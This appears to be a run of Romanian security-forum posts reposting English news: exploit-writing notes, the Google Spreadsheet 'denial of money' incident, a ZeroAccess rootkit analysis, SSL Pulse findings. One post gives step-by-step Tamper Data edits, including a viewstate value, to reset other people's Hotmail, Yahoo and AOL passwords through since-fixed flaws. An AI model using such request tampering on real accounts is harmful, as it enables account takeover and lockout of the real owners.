look at parameters values and then try to use the same values on the exploit. Sample Exploits: To see this technique in action take a look at the exploits available with this paper: • SSExploit2 • MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 • TapiExploit • MS05-040 - Telephony Service Vulnerability – CAN-2005-0058 Conclusion: As you have seen it is very easy to build almost 100% reliable (I'm saying “almost” because not all vulnerabilities are easy to exploit and a few are complex to exploit in a reliable way) exploits by using this technique, building a simple local stack overflow multi language and service pack independent exploit will take you no more than 5-10 minutes, at least that was what it took me to build the local TAPI (MS05-040) exploit Sursa: http://www.exploit-db.com/wp-content/themes/exploit/docs/12.pdf

Facebook has launched Anti-Virus Marketplace , a new portal to protect the social network's users.Members are being encouraged to download anti-malware programs which they can use at no cost for six months. Facebook is strengthening its security controls in an attempt to protect its 900 million users from spam and malicious content.Facebook said Wednesday that it will work with Microsoft Corp. and with computer security firms Trend Micro Inc., Sophos, Symantec Corp. and Intel Corp.'s McAfee to provide safeguards on Facebook. "The Antivirus Marketplace was developed with industry partners to enhance protection for people on Facebook," Facebook wrote in a blog post. "This program will help us provide even better protections to those using Facebook, no matter where they are on the web." Facebook's security push comes as social networks become an increasingly popular target for spammers and hackers, as Sophos suggests in a report on the top countries responsible for spam. Facebook also plans to incorporate the various security firms' URL blacklists into its own anti-spam efforts. The company says the current blacklist limits spam to just four percent of all content posted on Facebook. Sursa: Facebook strengthens security with AntiVirus Marketplace | The Hacker News Sunt produse destul de interesante si sunt gratuite 6 luni. https://www.facebook.com/security/app_363688420329497

Panos Ipeirotis, a computer scientists working at New York University,attack on his Amazon web service using Google Spreadsheets and Panos Ipeirotis checked his Amazon Web Services bill last week - its was $1,177.76 ! He had accidentally invented a brand new type of internet attack, thanks to an idiosyncrasy in the online spreadsheets Google runs on its Google Docs service, and he had inadvertently trained this attack on himself. He calls it a Denial of Money attack, and he says others could be susceptible too. On his personal blog Ipeirotis explained that it all started when he saw that Amazon Web Services was charging him with ten times the usual amount because of large amounts of outgoing traffic. As part of an experiment in how to use crowdsourcing to generate descriptions of images, he had posted thumbnails of 25,000 pictures into a Google document, and then he invited people to describe the images. The problem was that these thumbnails linked back to original images stored on Amazon’s S3 storage service, and apparently, Google’s servers went slightly bonkers. “Google just very aggressively grabbed the images from Amazon again and again and again,” he says. After analyzing traffic logs he was able to determine that every hour a total of 250 gigabytes of traffic was sent out because of Google’s Feedfetcher, the mechanism that allows the search engine to grab RSS or Atom feeds when users add them to Reader or the main page. After speaking with Google representatives, Ipeirotis believes that the company is trying to balance user privacy with a desire to present fresh content. It seems that Google doesn’t want to store the information on its own servers so it uses Feedfetcher to retrieve it every time, thus generating large amounts of traffic. “Google becomes such a powerful weapon due to a series of perfectly legitimate design decisions,” Ipeirotis wrote in a blog posting on the issue. Sursa:http://thehackernews.com/2012/04/accidentally-invented-dos-attack-using.html

Si inca un articol despre acest rootkit puteti gasi aici: Analysis of ZeroAccess Rootkit / Malware / Security Analysis / Downloads - Tuts 4 You Author Marco Giuliani Description When we write about ZeroAccess rootkit, it is essential to go back in 2009 and to remind when this rootkit had been discovered in the wild. It was the time of MBR rootkit and TDL2 rootkit – the second major release of the most advanced kernel mode rootkit currently in the wild – when security researchers came across a new, previously unknown, rootkit able to kill most of security software as soon as they tried to scan specified folders in the system. ZeroAccess was creating a new kernel device object called __max++> , this is the reason why the rootkit has quickly become known in the security field as the max++ rootkit, also known as ZeroAccess due to a string found in the kernel driver code, presumably pointing to the original project folder called ZeroAccess (f: \VC5\release\ZeroAccess.pdb). This rootkit was storing its code in two alternate data streams, win32k.sys:1 and win32k.sys:2. To avoid being detected, it was killing every security software that attempted to scan for alternate data streams. It created in the system folder a number of fake junctions (note: an NTFS junction point is a feature of the NTFS file system that allows a folder to be linked to another local folder, becoming an alias for such target folder) pointing to the fake rootkit device written above. When security software tried to scan such specified folders for Alternate Data Streams presence (FileStreamInformation class), the rootkit’s selfdefense queued a work item in the security process able to immediately kill it. It became a non-trivial job scanning the system without being killed. Since then, ZeroAccess rootkit evolved, changing the way it infects the system, becoming yet more advanced and dangerous. In this paper we are going to analyse this threat and how it evolved to its current release. E o completare,scuze daca am postat gresit.

Un video facut de un arab era public de pe 21.4.2012 si a fost fixata cam dupa o saptamana.Deci aveati timp o saptamana. L.E: "Publicat în 21.04.2012"

Yesterday we Reported a 0-Day Vulnerability in Hotmail, which allowed hackers to reset account passwords and lock out the account's real owners. Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data.When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose. Microsoft spokesperson confirmed the existence of the security flaw and the fix, but offered no further details: “On Friday, we addressed an incident with password reset functionality; there is no action for customers, as they are protected.” Later Today another unknown hacker reported another similar vulnerabilities in Hotmail, Yahoo and AOL. Using same Tamper Data add-on attacker is able to Reset passwords of any account remotely. This is somewhat a critical Vulnerability ever exposed, Millions of users can effected in result. Here Below Hacker Demonstrated Vulnerabilities: Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx . Step 2. Enter the Target Email and enter the 6 characters you see. Step 3. Start Tamper Data Step 4. Delete Element "SendEmail_ContinueCmd" Step 5. change Element "__V_previousForm" to "ResetOptionForm" Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2 Fak6gMIVsxSlDMZxkMkI" Step 7. Click O.K and Type THe new Password Step 8. sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time http://www.youtube.com/watch?feature=player_embedded&v=wdyDN82Egaw 2.Yahoo Step 1. Go to this page https://edit.yahoo.com/forgot . Step 2. EnTer the Target Email . and Enter the 6 characters you see . Step 3. Start Tamper Data Delete Step 4. change Element "Stage" to "fe200" Step 5. Click O.K and Type The new Password Step 6. Start Tamper Data All in Element Z 3.AOL http://3.bp.blogspot.com/-e8PtNqMamkA/T5w58OgG-KI/AAAAAAAAF6g/88O-NuSiLHo/s640/1.png Step 1. Go to Reset Page Step 2. EnTer the Target Email . and Enter the characters you see . Step 3. Start Tamper Data Step 4. change Element "action" to "pwdReset" Step 5. change Element "isSiteStateEncoded" to "false" Step 6. Click O.K and Type THe new Password Step 7. Start TamperDaTa All in Element rndNO Step 8. done Source:Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities | The Hacker News

90% of the Internet's top 200,000 HTTPS-enabled websites are vulnerable to known types of SSL (Secure Sockets Layer) attack, according to a report released Thursday by the Trustworthy Internet Movement (TIM), a nonprofit organization dedicated to solving Internet security, privacy and reliability problems. The report is based on data from a new TIM project called SSL Pulse, which uses automated scanning technology developed by security vendor Qualys, to analyze the strength of HTTPS implementations on websites listed in the top one million published by Web analytics firm Alexa. SSL Pulse checks what protocols are supported by the HTTPS-enabled websites (SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, etc.), the key length used for securing communications (512 bits, 1024 bits, 2048 bits, etc.) and the strength of the supported ciphers (256 bits, 128 bits or lower). The BEAST attack takes advantage of a flaw in SSL 3.0, allowing the attacker to grab and decrypt HTTPS cookies on an end user’s browser, effectively hijacking the victim’s session. This could be achieved either through an iframe injection or by loading the BEAST JavaScript into the victim’s browser, but BEAST is known to be especially hard to execute. TIM has established a taskforce of security experts, who will review SSL governance issues and develop proposals aimed at fixing both SSL and the certificate authority systems, both of which have been called into question in recent times. In the case of certificate authorities (CAs), a number of them have been compromised in the past year, allowing attackers to spoof websites with fake certificates. One of those CAs, DigiNotar, went bankrupt after it was hacked. The attack was fixed in version 1.1 of the Transport Layer Security (TLS) protocol, but a lot of servers continue to support older and vulnerable protocols, like SSL 3.0, for backward compatibility reasons. Such servers are vulnerable to so-called SSL downgrade attacks in which they can be tricked to use vulnerable versions of SSL/TLS even when the targeted clients support secure versions. The taskforce members include Michael Barrett, chief information security officer at PayPal; Taher Elgamal, one of the creators of the SSL protocol; Adam Langley, a Google software engineer responsible for SSL in Chrome and on the company's front-end servers; Moxie Marlinspike, the creator of the Convergence project, which offers an alternative method for SSL certificate validation; Ivan Ristic, the creator of the Qualys SSL Labs and Ryan Hurst, chief technology officer at certificate authority GlobalSign.

Part 1: InfoSec Resources – Stack Based Buffer Overflow Tutorial, part 1 – Introduction Part 2: InfoSec Resources – Stack Based Buffer Overflow Tutorial, part 2 – Exploiting the stack overflow Part 3: InfoSec Resources – Stack Based Buffer Overflow Tutorial, part 3 – Adding shellcode

Puteti citi aici: InfoSec Resources – OllyDbg Tricks for Exploit Development

Si eu la animatie am incercat fiecare cuvant pana sa mearga.

Da este adevarat.L-am vazut de dimineata distribuit pe facebook de cei de la Offensive Security,deci ar trebui sa fie ceva serios si cred ca si ei sunt in parteneriat. Ar trebui sa ne asteptam la ceva interesant.